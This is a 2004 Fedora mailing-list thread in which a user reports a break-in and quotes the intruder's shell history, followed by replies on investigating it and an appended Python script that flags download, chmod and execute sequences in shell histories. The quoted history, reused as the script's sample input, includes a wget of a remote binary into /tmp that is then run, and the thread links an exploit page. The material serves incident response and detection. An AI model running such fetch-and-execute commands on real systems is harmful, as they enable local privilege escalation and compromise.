Vulnerability on FC3T2 ? Present in FC3 ?
Aaron Scott
scott.aaron at abc.net.au
Mon Nov 22 04:57:23 UTC 2004
I really should add as well that the exploit mentioned is a local
exploit. You need to be on the machine first as a local user before you
can execute it. Maybe check the non-root user histories as well. Maybe
someone has pinched your password.
On Mon, 2004-11-22 at 15:51 +1100, Aaron Scott wrote:
> And how does this prove that there is a vulnerability in fedora and
> not that you have poor security?
>
> According to the URLs you post, someone has installed a rootkit.
> Unlucky. But they had to get it there first.
>
> You should first discover how they got onto your machine. You will
> need to check a lot more logs than just wtmp. Try secure and
> messages as well. Maybe someone guessed your password. I really
> hope that you have firewalled that ip range out to help prevent
> further trouble from that IP range ( assuming though the hacker isn't
> bouncing from compromised machine to compromised machine ). Also, you
> might want to consider who has had or might have had physical access
> to your machine ( if that is possible ).
>
> Pointing the finger at Fedora without real proof is pointless.
>
>
> On Mon, 2004-11-22 at 02:14 +0000, richard mullens wrote:
>
> > Someone logged into my system on 13 Nov 2004
> > I found the following in /var/log/wtmp
> >
> > 207-36-180-20.prt.primarydns.com
> > demo.allegientsystems.com
> >
> > My user password was changed - but not the root password - and the
> > following commands had been executed:-
> >
> > w
> > uname -a
> > cat /etc/issue
> > cd /tmp
> > wget chebeleu.com/local
> > chmod +x local
> > ./local -d -r
> > ./local -d -r
> > lunx
> > lynx
> >
> > There is a similar report dated 10-Nov-2004 at
> > http://episteme.arstechnica.com/eve/ubb.x?a=tpc&s=50009562&f=96509133&m=531005547631
> > where someone suggested it might be the exploit at
> > http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php
> >
> > Anybody know any more ?
> >
>
> --
> fedora-test-list mailing list
> fedora-test-list at redhat.com
> To unsubscribe:
> http://www.redhat.com/mailman/listinfo/fedora-test-list
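
The history review suggested in this thread, as an added example that is not part of the original messages: a small Python scan of a user's shell history for the download, chmod, execute sequence shown in the report. The function names, the assumed starting directory and the list of world-writable directories are assumptions; the sample input is the command list quoted above.

```python
import shlex
from pathlib import PurePosixPath

# Directories any local user can write to.
WORLD_WRITABLE = [PurePosixPath(d) for d in ("/tmp", "/var/tmp", "/dev/shm")]
DOWNLOADERS = {"wget", "curl"}

# The command list quoted in the report above, one history line each.
SAMPLE_HISTORY = ["w", "uname -a", "cat /etc/issue", "cd /tmp",
                  "wget chebeleu.com/local", "chmod +x local",
                  "./local -d -r", "./local -d -r", "lunx", "lynx"]


def adds_exec_bit(mode):
    """True for symbolic modes containing x, or octal modes with an odd digit."""
    return "x" in mode or (mode.isdigit() and any(int(d) & 1 for d in mode))


def find_drop_and_run(lines, start_dir="/home/user"):
    """Return (line_no, path, in_world_writable_dir) for every execution of a
    file that the same history shows being downloaded and made executable."""
    cwd = PurePosixPath(start_dir)   # assumed starting directory of the session
    fetched, executable, findings = set(), set(), []
    for line_no, line in enumerate(lines, 1):
        try:
            argv = shlex.split(line)
        except ValueError:           # unbalanced quotes: skip, do not crash
            continue
        if not argv:
            continue
        cmd, args = argv[0], argv[1:]
        if cmd == "cd" and args:
            cwd = cwd / args[0]      # an absolute argument replaces cwd
        elif cmd in DOWNLOADERS:
            # Assumption: the file is saved under the URL's last path component.
            for a in args:
                if not a.startswith("-") and "/" in a:
                    fetched.add(cwd / a.rstrip("/").rsplit("/", 1)[-1])
        elif cmd == "chmod" and len(args) >= 2 and adds_exec_bit(args[0]):
            executable.update(cwd / a for a in args[1:])
        elif cmd.startswith(("./", "/")):
            target = cwd / cmd
            if target in fetched and target in executable:
                risky = any(d in target.parents for d in WORLD_WRITABLE)
                findings.append((line_no, str(target), risky))
    return findings


if __name__ == "__main__":
    for hit in find_drop_and_run(SAMPLE_HISTORY):
        print(hit)
```

Relative `cd ..` steps are not resolved, so a hit is a lead to follow up in secure and messages, not proof on its own.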